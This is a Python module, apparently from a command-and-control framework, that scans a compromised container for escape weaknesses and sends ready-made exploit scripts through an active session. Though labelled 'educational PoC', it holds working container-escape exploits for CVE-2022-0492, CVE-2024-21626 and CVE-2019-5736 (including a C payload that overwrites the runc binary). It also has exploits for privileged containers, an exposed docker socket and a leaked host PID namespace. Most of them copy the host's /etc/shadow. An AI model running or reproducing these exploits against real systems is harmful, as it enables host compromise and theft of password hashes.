"""Container CVE scanning + exploitation through an active session (Kubesploit-style).

The scan runs a single POSIX shell script on the target that emits lines of the
form ``CVE|<id>|<status>|<detail>``; the statuses are:
    vulnerable  - the check deterministically confirms exposure
    possibly    - version/kernel-range only, requires manual validation
    clean       - check confirms the weakness is not present
    unknown     - the check could not determine the answer

Exploits are single-script educational PoCs delivered through the existing
command channel (``Session.send``), so no agent changes are required.
"""

from __future__ import annotations

import re
from typing import Optional

# ── CVE / posture catalog ──────────────────────────────────────────────────

# id: (name, severity, description)
CVE_CATALOG: dict[str, tuple[str, str, str]] = {
    "CVE-2019-5736": (
        "runc container breakout",
        "critical",
        "runc before 1.0-rc6 lets a malicious container overwrite the host runc binary "
        "via /proc/self/exe during 'docker exec' (container escape).",
    ),
    "CVE-2022-0492": (
        "cgroup v1 release_agent escape",
        "high",
        "Cgroups v1 allow a writable release_agent to execute host commands when a "
        "process exits, enabling a container escape (kernel 5.8+ / most cgroup v1 hosts).",
    ),
    "CVE-2024-21626": (
        "runc leaked workdir fd escape",
        "high",
        "runc (< 1.1.12) leaks an internal 'workdir' file descriptor into the container, "
        "allowing escape via 'cd /proc/self/fd/<n>'.",
    ),
    "CVE-2022-0847": (
        "Dirty Pipe (kernel 5.8-5.16.10)",
        "high",
        "Uninitialized pipe buffer flag lets an unprivileged process overwrite read-only "
        "files (requires in-container root to be useful for escape).",
    ),
    "CVE-2022-0185": (
        "fs_context heap overflow (kernel < 5.16.2)",
        "high",
        "Legacy fs_context parsing in the kernel allows heap overflow leading to LPE; "
        "exploitable from inside a container.",
    ),
    "CVE-2021-22555": (
        "netfilter nft_object LPE (kernel < 5.12)",
        "high",
        "Heap out-of-bounds write in nftables allows privilege escalation; container "
        "escape historically chained with it.",
    ),
    "CTR-PRIV": (
        "privileged container",
        "critical",
        "Container is running with all capabilities (CAP_SYS_ADMIN etc.), enabling "
        "host namespace escape.",
    ),
    "CTR-DOCKERSOCK": (
        "docker socket exposed",
        "critical",
        "The docker control socket is mounted, allowing full host compromise via the "
        "Docker API.",
    ),
    "CTR-PIDLEAK": (
        "host PID namespace visible",
        "high",
        "Host PID 1 and its filesystem are reachable from the container (breakout).",
    ),
    "CTR-NETLEAK": (
        "host network visible",
        "medium",
        "Host network interfaces / arp table are visible through /proc/1/net.",
    ),
    "CTR-K8S-TOKEN": (
        "kubernetes SA token mounted",
        "medium",
        "A Kubernetes service-account token is mounted, granting cluster API access.",
    ),
    "CTR-K8S-ENV": (
        "in-cluster Kubernetes",
        "low",
        "Kubernetes metadata environment variables are present; pod can reach the "
        "cluster API.",
    ),
    "CTR-ROOT": (
        "running as root",
        "high",
        "Process uid is 0, simplifying most escape and post-exploitation paths.",
    ),
}

# CVEs with an automated exploit PoC in this module
EXPLOITABLE: tuple[str, ...] = (
    "CVE-2022-0492",
    "CVE-2024-21626",
    "CVE-2019-5736",
    "CTR-PRIV",
    "CTR-DOCKERSOCK",
    "CTR-PIDLEAK",
)


# ── scan script ─────────────────────────────────────────────────────────────

_SCAN_SCRIPT = r"""#!/bin/sh
# webforg container CVE scan (Kubesploit-style) - generated by c2_ops
set +e
out() { printf 'CVE|%s|%s|%s\n' "$1" "$2" "$3"; }

# kernel version compare: kge MAJ MIN PAT  (exit 0 if kernel >= that version)
kge() {
  _v=$(uname -r)
  _maj=${_v%%\.*}; _v=${_v#*.}
  _min=${_v%%\.*}; _v=${_v#*.}
  _pat=${_v%%[!0-9]*}; _pat=${_pat:-0}
  [ "$_maj" -gt "$1" ] && return 0
  [ "$_maj" -lt "$1" ] && return 1
  [ "$_min" -gt "$2" ] && return 0
  [ "$_min" -lt "$2" ] && return 1
  [ "$_pat" -ge "$3" ]
}

K=$(uname -r 2>/dev/null)

# CVE-2019-5736 : runc before 1.0-rc6
RV=$(runc --version 2>/dev/null | sed -n 's/.*version \([0-9][^ ]*\).*/\1/p' | head -1)
case "$RV" in
  "")        out CVE-2019-5736 unknown "runc binary not found" ;;
  0.*|1.0.0-rc*) out CVE-2019-5736 possibly "runc $RV" ;;
  *)         out CVE-2019-5736 clean "runc $RV" ;;
esac

# CVE-2022-0492 : cgroup v1 writable release_agent
if [ -w /sys/fs/cgroup/release_agent ] && [ -f /sys/fs/cgroup/release_agent ]; then
  out CVE-2022-0492 vulnerable "/sys/fs/cgroup/release_agent writable"
elif [ -f /sys/fs/cgroup/release_agent ]; then
  out CVE-2022-0492 clean "release_agent read-only (cgroup v1)"
else
  out CVE-2022-0492 clean "cgroup v2 (no release_agent)"
fi

# CVE-2024-21626 : runc leaked workdir fd
FDHITS=$(ls -la /proc/self/fd/ 2>/dev/null | grep -c -E 'workdir|runc')
if [ "${FDHITS:-0}" -gt 0 ]; then
  out CVE-2024-21626 vulnerable "leaked runc workdir fd in /proc/self/fd"
else
  out CVE-2024-21626 clean "no leaked workdir fd"
fi

# CVE-2022-0847 : Dirty Pipe, kernel 5.8 <= k < 5.16.11
if kge 5 8 0 && ! kge 5 16 11; then
  out CVE-2022-0847 possibly "kernel $K (needs in-container root)"
else
  out CVE-2022-0847 clean "kernel $K"
fi

# CVE-2022-0185 : fs_context, kernel < 5.16.2
if kge 5 1 0 && ! kge 5 16 2; then
  out CVE-2022-0185 possibly "kernel $K"
else
  out CVE-2022-0185 clean "kernel $K"
fi

# CVE-2021-22555 : netfilter, kernel < 5.12
if kge 5 1 0 && ! kge 5 12 0; then
  out CVE-2021-22555 possibly "kernel $K"
else
  out CVE-2021-22555 clean "kernel $K"
fi

# privileged container (full capability mask)
CAP=$(awk '/^CapEff/{print $2}' /proc/self/status 2>/dev/null)
if [ -n "$CAP" ] && [ $((0x${CAP} & 0x3fffffffff)) -eq 1099511627775 ]; then
  out CTR-PRIV vulnerable "all caps set (CapEff=$CAP)"
else
  out CTR-PRIV clean "limited caps (CapEff=$CAP)"
fi

# docker socket
if [ -S /var/run/docker.sock ]; then
  out CTR-DOCKERSOCK vulnerable "/var/run/docker.sock present"
else
  out CTR-DOCKERSOCK clean "no docker socket"
fi

# host PID namespace
if [ -r /proc/1/root/etc/hostname ] 2>/dev/null; then
  out CTR-PIDLEAK vulnerable "host /proc/1 visible from container"
else
  out CTR-PIDLEAK clean "host PID namespace isolated"
fi

# host network
if [ -r /proc/1/net/arp ] 2>/dev/null; then
  out CTR-NETLEAK vulnerable "host network via /proc/1/net"
else
  out CTR-NETLEAK clean "host network isolated"
fi

# k8s service account
if [ -f /var/run/secrets/kubernetes.io/serviceaccount/token ]; then
  out CTR-K8S-TOKEN vulnerable "k8s SA token mounted"
else
  out CTR-K8S-TOKEN clean "no k8s SA token"
fi

if [ -n "$KUBERNETES_SERVICE_HOST" ]; then
  out CTR-K8S-ENV possibly "k8s API at $KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT"
else
  out CTR-K8S-ENV clean "no k8s metadata"
fi

# running as root
if [ "$(id -u 2>/dev/null)" = "0" ]; then
  out CTR-ROOT vulnerable "running as root (uid 0)"
else
  out CTR-ROOT clean "non-root"
fi

exit 0
"""


def build_scan_script() -> str:
    return _SCAN_SCRIPT


# ── exploit PoCs ────────────────────────────────────────────────────────────

_EXPLOITS: dict[str, tuple[str, str]] = {
    "CVE-2022-0492": (
        "cgroup v1 release_agent escape: mounts a cgroup, registers a release_agent "
        "that copies host evidence (/etc/shadow, hostname) into /tmp on the HOST.",
        r"""#!/bin/sh
# CVE-2022-0492 cgroup v1 release_agent escape (educational PoC)
D=/tmp/.wf_$$
mkdir -p "$D/x"
cat > "$D/cmd" <<'EOF'
#!/bin/sh
cat /etc/hostname > /tmp/wf_host_hostname 2>/dev/null
cat /etc/shadow > /tmp/wf_host_shadow 2>/dev/null
echo PWNED-by-wf-cve-2022-0492 > /tmp/wf_host_pwned
EOF
chmod 755 "$D/cmd"
mount -t cgroup -o rdma cgroup "$D/x" 2>/dev/null || mount -t cgroup cgroup "$D/x" 2>/dev/null || { echo '[!] cgroup mount failed'; exit 1; }
echo "$D/cmd" > "$D/x/release_agent" 2>/dev/null || { echo '[!] release_agent not writable'; exit 1; }
echo 1 > "$D/x/notify_on_release" 2>/dev/null
echo $$ > "$D/x/cgroup.procs"
sleep 1
echo '[*] host evidence:'
cat /tmp/wf_host_hostname 2>/dev/null
cat /tmp/wf_host_pwned 2>/dev/null
head -3 /tmp/wf_host_shadow 2>/dev/null
echo '[*] done (evidence left in /tmp/wf_host_* on the host)'
""",
    ),
    "CVE-2024-21626": (
        "runc leaked workdir fd escape: walks /proc/self/fd, cd's into the leaked "
        "host directory and lists host files.",
        r"""#!/bin/sh
# CVE-2024-21626 runc leaked workdir fd escape (educational PoC)
echo '[*] probing /proc/self/fd for runc workdir handles'
for fd in $(ls /proc/self/fd/ 2>/dev/null | grep -E '^[0-9]+$'); do
  tgt=$(readlink "/proc/self/fd/$fd" 2>/dev/null)
  case "$tgt" in
    *workdir*|*runc*|*/containers/*|*/exec/*)
      echo "fd $fd -> $tgt"
      ( cd "/proc/self/fd/$fd" 2>/dev/null && echo "[+] escaped cwd: $(pwd)" && ls -la && cat ../../../../etc/hostname 2>/dev/null )
      ;;
  esac
done
echo '[*] done'
""",
    ),
    "CVE-2019-5736": (
        "runc binary overwrite PoC: compiles the classic /proc/self/exe overwrite "
        "payload on the agent and reports how to trigger it from the host (not run "
        "automatically - it would corrupt the running shell).",
        r"""#!/bin/sh
# CVE-2019-5736 runc container escape (PoC build only)
cat > /tmp/runc_poc.c <<'EOF'
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
int main(void) {
    char *payload = "#!/bin/sh\\nid > /tmp/wf_host_id; cat /etc/shadow > /tmp/wf_host_shadow\\n";
    char *path = "/proc/self/exe";
    int fd;
    unlink(path);
    fd = open(path, O_WRONLY);
    if (fd < 0) { perror("open"); return 1; }
    write(fd, payload, strlen(payload));
    close(fd);
    printf("[*] runc binary replaced with payload\\n");
    return 0;
}
EOF
if command -v gcc >/dev/null 2>&1; then
  gcc -O2 -static /tmp/runc_poc.c -o /tmp/runc_poc 2>&1
  echo '[+] built /tmp/runc_poc'
  echo '[*] deploy into the container image and trigger via host: docker exec <ctr> /tmp/runc_poc'
  echo '[*] (host must use vulnerable runc; execution will overwrite the host /bin/sh payload)'
else
  echo '[!] gcc not available on agent - compile /tmp/runc_poc.c on the host'
fi
""",
    ),
    "CTR-PRIV": (
        "privileged container escape: nsenter into host PID 1 namespaces and dump "
        "host evidence.",
        r"""#!/bin/sh
# privileged container -> host namespace escape (educational PoC)
echo '[*] trying nsenter into host namespaces'
nsenter -t 1 -m -u -i -n --preserve-credentials -- sh -c 'echo "[+] host hostname: $(hostname)"; cat /etc/shadow 2>/dev/null | head -3' 2>&1 || echo '[!] nsenter failed (missing binary or not privileged)'
echo '[*] trying chroot /proc/1/root'
cat /proc/1/root/etc/hostname 2>/dev/null && echo '[+] /proc/1/root readable' || echo '[!] /proc/1/root not accessible'
""",
    ),
    "CTR-DOCKERSOCK": (
        "docker socket escape: use the mounted docker socket to bind the host "
        "filesystem into a throwaway container and read /etc/shadow.",
        r"""#!/bin/sh
# docker socket escape (educational PoC)
if command -v docker >/dev/null 2>&1; then
  docker run --rm -v /:/host busybox sh -c 'cat /host/etc/hostname 2>/dev/null; head -3 /host/etc/shadow 2>/dev/null; echo PWNED > /host/tmp/wf_host_pwned' 2>&1
else
  echo '[*] docker CLI missing, querying raw socket'
  curl -s --unix-socket /var/run/docker.sock http://localhost/version 2>/dev/null | head -c 300
  echo ''
fi
echo '[*] done'
""",
    ),
    "CTR-PIDLEAK": (
        "host filesystem via /proc/1/root: read host /etc/shadow and hostname "
        "directly from the leaked PID 1 mount.",
        r"""#!/bin/sh
# host filesystem via leaked /proc/1/root (educational PoC)
cat /proc/1/root/etc/hostname 2>/dev/null
head -3 /proc/1/root/etc/shadow 2>/dev/null
echo '[*] done'
""",
    ),
}


# ── public API ──────────────────────────────────────────────────────────────

def _parse_scan_output(out: str) -> list[dict]:
    """Parse `CVE|id|status|detail` records, tolerating interactive-shell
    prompt noise (e.g. `# # # > > > > CVE|...` from /bin/sh -i sessions)."""
    findings: list[dict] = []
    pat = re.compile(r"CVE\|([^|]+)\|([^|]+)\|((?:(?!CVE\|).)*)")
    for m in pat.finditer(out or ""):
        cve, status, detail = m.group(1), m.group(2), m.group(3).strip()
        detail = re.sub(r"[\s#>]+$", "", detail).strip()
        if not cve or not status:
            continue
        name, severity, description = CVE_CATALOG.get(
            cve, (cve, "info", "No catalog entry")
        )
        findings.append({
            "cve": cve,
            "name": name,
            "severity": severity,
            "description": description,
            "status": status,
            "detail": detail,
        })
    return findings


def scan_cves(session, timeout: float = 45.0, session_id: Optional[str] = None) -> dict:
    """Run the container CVE scan on an active session and parse the results."""
    script = build_scan_script()
    if getattr(session, "session_type", "shell") == "shell":
        script = "PS1=''; PS2=''; PS4='';" + script + "\necho '__CVE_SCAN_DONE__'\n"
    out = session.send(script, timeout=timeout) or ""
    findings = _parse_scan_output(out)
    vuln = sum(1 for f in findings if f["status"] == "vulnerable")
    poss = sum(1 for f in findings if f["status"] == "possibly")
    clean = sum(1 for f in findings if f["status"] == "clean")
    unknown = sum(1 for f in findings if f["status"] == "unknown")
    return {
        "ok": True,
        "session_type": getattr(session, "session_type", "shell"),
        "summary": f"{vuln} vulnerable, {poss} possibly vulnerable, {clean} clean, {unknown} unknown",
        "vulnerable_count": vuln,
        "possibly_count": poss,
        "findings": findings,
    }


def exploit_cve(
    session, cve_id: str, timeout: float = 60.0, session_id: Optional[str] = None
) -> dict:
    """Deliver an exploit PoC for a CVSS-tagged weakness to the target."""
    cve_id = (cve_id or "").strip().upper()
    if cve_id not in _EXPLOITS:
        name = CVE_CATALOG.get(cve_id, (cve_id, "info", ""))[0]
        return {
            "ok": False,
            "cve": cve_id,
            "name": name,
            "note": "No automated exploit is available for this finding. "
                    "Options: CVE-2022-0492, CVE-2024-21626, CVE-2019-5736, "
                    "CTR-PRIV, CTR-DOCKERSOCK, CTR-PIDLEAK.",
            "output": "",
        }
    note, script = _EXPLOITS[cve_id]
    output = session.send(script, timeout=timeout) or ""
    return {
        "ok": True,
        "cve": cve_id,
        "name": CVE_CATALOG[cve_id][0],
        "severity": CVE_CATALOG[cve_id][1],
        "note": note,
        "output": output,
    }


def list_exploitable() -> list[dict]:
    return [
        {"cve": cve, "name": CVE_CATALOG[cve][0], "severity": CVE_CATALOG[cve][1]}
        for cve in EXPLOITABLE
    ]
